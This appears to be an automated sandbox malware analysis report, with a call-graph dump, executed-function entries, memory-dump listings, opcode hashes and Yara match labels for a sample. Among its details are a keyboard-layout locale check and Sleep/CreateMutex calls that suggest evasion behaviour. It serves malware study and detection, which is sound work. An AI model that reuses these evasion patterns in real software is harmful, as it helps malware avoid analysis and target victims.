12496->12497 12499 b3f5c0 __cftof 12497->12499 12498 b3f606 12498->12488 12499->12498 12500 b38bec __cftof 4 API calls 12499->12500 12501 b3f62b 12500->12501 12503 b3a671 __cftof 4 API calls 12502->12503 12504 b3e6bb 12503->12504 12507 b3e5c9 12504->12507 12506 b3e6c1 12506->12492 12511 b3e5d5 __cftof __freea 12507->12511 12508 b3e5f6 12508->12506 12509 b38bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12510 b3e668 12509->12510 12512 b3e6a4 12510->12512 12513 b3a72e __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12510->12513 12511->12508 12511->12509 12512->12506 12514 b3e695 12513->12514 12515 b3e4b0 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12514->12515 12515->12512 12723 b020c0 12724 b1c68b __Mtx_init_in_situ 2 API calls 12723->12724 12725 b020cc 12724->12725 12726 b0e0c0 recv 12727 b0e122 recv 12726->12727 12728 b0e157 recv 12727->12728 12729 b0e191 12728->12729 12730 b0e2b3 std::invalid_argument::invalid_argument 12729->12730 12735 b1c6ac 12729->12735 12742 b1c452 12735->12742 12737 b0e2ee 12738 b1c26a 12737->12738 12739 b1c292 12738->12739 12740 b1c274 12738->12740 12739->12739 12740->12739 12759 b1c297 12740->12759 12743 b1c4a8 12742->12743 12745 b1c47a std::invalid_argument::invalid_argument 12742->12745 12743->12745 12748 b1cf6b 12743->12748 12745->12737 12746 b1c4fd __Xtime_diff_to_millis2 12746->12745 12747 b1cf6b _xtime_get GetSystemTimePreciseAsFileTime 12746->12747 12747->12746 12749 b1cf7a 12748->12749 12751 b1cf87 __aulldvrm 12748->12751 12749->12751 12752 b1cf44 12749->12752 12751->12746 12755 b1cbea 12752->12755 12756 b1cc07 12755->12756 12757 b1cbfb GetSystemTimePreciseAsFileTime 12755->12757 12756->12751 12757->12756 12762 b02ae0 12759->12762 12761 b1c2ae std::_Throw_future_error 12763 b1bedf InitOnceExecuteOnce 12762->12763 12765 b02af4 __cftof 12763->12765 12764 b02aff 12764->12761 12765->12764 12766 b3a671 __cftof 4 API calls 12765->12766 12769 b36ccc 12766->12769 12767 b38bec __cftof 4 API calls 12768 b36cf6 12767->12768 12769->12767 12824 b08980 12826 b089d8 shared_ptr 12824->12826 12827 b08aea 12824->12827 12825 b05c10 6 API calls 12825->12826 12826->12825 12826->12827 12984 b02e00 12985 b02e28 12984->12985 12986 b1c68b __Mtx_init_in_situ 2 API calls 12985->12986 12987 b02e33 12986->12987 13337 b09f44 13338 b09f4c shared_ptr 13337->13338 13339 b0a953 Sleep CreateMutexA 13338->13339 13341 b0a01f shared_ptr 13338->13341 13340 b0a98e 13339->13340 12770 b1d0c7 12772 b1d0d7 12770->12772 12771 b1d17f 12772->12771 12773 b1d17b RtlWakeAllConditionVariable 12772->12773 12784 b03c47 12785 b03c51 12784->12785 12788 b03c5f 12785->12788 12791 b032d0 12785->12791 12786 b03c68 12788->12786 12789 b03810 4 API calls 12788->12789 12790 b03cdb 12789->12790 12792 b1c6ac GetSystemTimePreciseAsFileTime 12791->12792 12797 b03314 12792->12797 12793 b0336b 12794 b1c26a 5 API calls 12793->12794 12796 b0333c __Mtx_unlock 12794->12796 12798 b1c26a 5 API calls 12796->12798 12799 b03350 std::invalid_argument::invalid_argument 12796->12799 12797->12793 12797->12796 12810 b1bd4c 12797->12810 12800 b03377 12798->12800 12799->12788 12801 b1c6ac GetSystemTimePreciseAsFileTime 12800->12801 12802 b033af 12801->12802 12803 b1c26a 5 API calls 12802->12803 12804 b033b6 __Cnd_broadcast 12802->12804 12803->12804 12805 b1c26a 5 API calls 12804->12805 12806 b033d7 __Mtx_unlock 12804->12806 12805->12806 12807 b1c26a 5 API calls 12806->12807 12808 b033eb 12806->12808 12809 b0340e 12807->12809 12808->12788 12809->12788 12813 b1bb72 12810->12813 12812 b1bd5c 12812->12797 12814 b1bb9c 12813->12814 12815 b1cf6b _xtime_get GetSystemTimePreciseAsFileTime 12814->12815 12818 b1bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 12814->12818 12816 b1bbcf __Xtime_diff_to_millis2 12815->12816 12817 b1cf6b _xtime_get GetSystemTimePreciseAsFileTime 12816->12817 12816->12818 12817->12818 12818->12812 12991 b36a44 12992 b36a52 12991->12992 12993 b36a5c 12991->12993 12996 b3698d 12993->12996 12995 b36a76 __freea 12997 b3690a __cftof 4 API calls 12996->12997 12998 b3699f 12997->12998 12998->12995 12646 b03c8e 12647 b03c98 12646->12647 12649 b03ca5 12647->12649 12654 b02410 12647->12654 12650 b03ccf 12649->12650 12658 b03810 12649->12658 12652 b03810 4 API calls 12650->12652 12653 b03cdb 12652->12653 12655 b02424 12654->12655 12662 b1b52d 12655->12662 12659 b0381c 12658->12659 12711 b02440 12659->12711 12670 b33aed 12662->12670 12664 b1b5a5 ___std_exception_copy 12677 b1b1ad 12664->12677 12666 b1b598 12673 b1af56 12666->12673 12669 b0242a 12669->12649 12681 b34f29 12670->12681 12672 b1b555 12672->12664 12672->12666 12672->12669 12674 b1af9f ___std_exception_copy 12673->12674 12676 b1afb2 shared_ptr 12674->12676 12687 b1b39f 12674->12687 12676->12669 12678 b1b1d8 12677->12678 12680 b1b1e1 shared_ptr 12677->12680 12679 b1b39f 5 API calls 12678->12679 12679->12680 12680->12669 12682 b34f2e __cftof 12681->12682 12682->12672 12683 b3d634 __cftof 4 API calls 12682->12683 12686 b38bfc __cftof 12682->12686 12683->12686 12684 b365ed __cftof 3 API calls 12685 b38c2f 12684->12685 12686->12684 12698 b1bedf 12687->12698 12690 b1b3e8 12690->12676 12707 b1cc31 12698->12707 12701 b36cbb 12702 b36cc7 __cftof 12701->12702 12703 b3a671 __cftof 4 API calls 12702->12703 12704 b36ccc 12703->12704 12705 b38bec __cftof 4 API calls 12704->12705 12706 b36cf6 12705->12706 12708 b1cc3f InitOnceExecuteOnce 12707->12708 12710 b1b3e1 12707->12710 12708->12710 12710->12690 12710->12701 12714 b1b5d6 12711->12714 12713 b02472 12716 b1b5f1 std::_Throw_future_error 12714->12716 12715 b38bec __cftof 4 API calls 12717 b1b69f 12715->12717 12716->12715 12718 b1b658 __cftof std::invalid_argument::invalid_argument 12716->12718 12718->12713

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00B3652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ExitProcess.KERNEL32(?,?,00B3652A,?,?,?,?,?,00B37661), ref: 00B36567
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                                              • Opcode ID: a84fb241a80e47c6fff63e00ba3b56fe5da5857dac52bc237bdc2e0ac5bd858c
                                                                                                                                                                                                                              • Instruction ID: 49bc20d4f7b327db1c7729b75db803e0ae107cb8bceaf271fa6aec4957366c85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a84fb241a80e47c6fff63e00ba3b56fe5da5857dac52bc237bdc2e0ac5bd858c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CE08C3010050CBFCF26BB18C80995D3BA9EB62755F218C60F9098A222CB75ED81C690
                                                                                                                                                                                                                              Function 04DB0D7B Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1501464681.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4db0000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 8bc72998a7fd4de9c6257742218d3c1477608363538d6781f0b05c9aac0ce822
                                                                                                                                                                                                                              • Instruction ID: 204bca8037cefa9f48bbb4b7d6798d88832c0ee73704ff58610c05023d94dc19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bc72998a7fd4de9c6257742218d3c1477608363538d6781f0b05c9aac0ce822
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F0E9EBA882246D224352DA27006F7AB8DD9D36713358477F883D7542E5C4490871F1
                                                                                                                                                                                                                              Function 00B05C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                              • API String ID: 0-3963862150
                                                                                                                                                                                                                              • Opcode ID: c5f57042b4aa9ea6c2960bb4a945fb484358a41e27aaf65cd22d142954c92457
                                                                                                                                                                                                                              • Instruction ID: 594a392f99ca8586dba614b829ef22177f6b3a41808ad381fe6ef79adbefcca0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5f57042b4aa9ea6c2960bb4a945fb484358a41e27aaf65cd22d142954c92457
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F1CF70A0024CABEB24DF54CC85BDEBBB9EB45304F5046E9E508A72C1DB74AA84CF94
                                                                                                                                                                                                                              Function 00B09BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 219 b09ba5-b09d91 call b17a00 call b05c10 call b08b30 call b18220
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 9b1140317212be37fe6299fa94e7a72fb07452aa0ebf8a883ca9ab346562c729
                                                                                                                                                                                                                              • Instruction ID: f72041c12fe04dcf6dcf20348402a7ab307d9dc8356b05cf1395014326b9f2ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b1140317212be37fe6299fa94e7a72fb07452aa0ebf8a883ca9ab346562c729
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6313731B042049BFB18DBB8DD897ADBFE2EFC6320F248699E014973D6C77599808761
                                                                                                                                                                                                                              Function 00B09F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 241 b09f44-b09f64 245 b09f92-b09fae 241->245 246 b09f66-b09f72 241->246 249 b09fb0-b09fbc 245->249 250 b09fdc-b09ffb 245->250 247 b09f74-b09f82 246->247 248 b09f88-b09f8f call b1d663 246->248 247->248 251 b0a92b 247->251 248->245 253 b09fd2-b09fd9 call b1d663 249->253 254 b09fbe-b09fcc 249->254 255 b0a029-b0a916 call b180c0 250->255 256 b09ffd-b0a009 250->256 258 b0a953-b0a994 Sleep CreateMutexA 251->258 259 b0a92b call b36c6a 251->259 253->250 254->251 254->253 262 b0a00b-b0a019 256->262 263 b0a01f-b0a026 call b1d663 256->263 271 b0a996-b0a998 258->271 272 b0a9a7-b0a9a8 258->272 259->258 262->251 262->263 263->255 271->272 273 b0a99a-b0a9a5 271->273 273->272
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
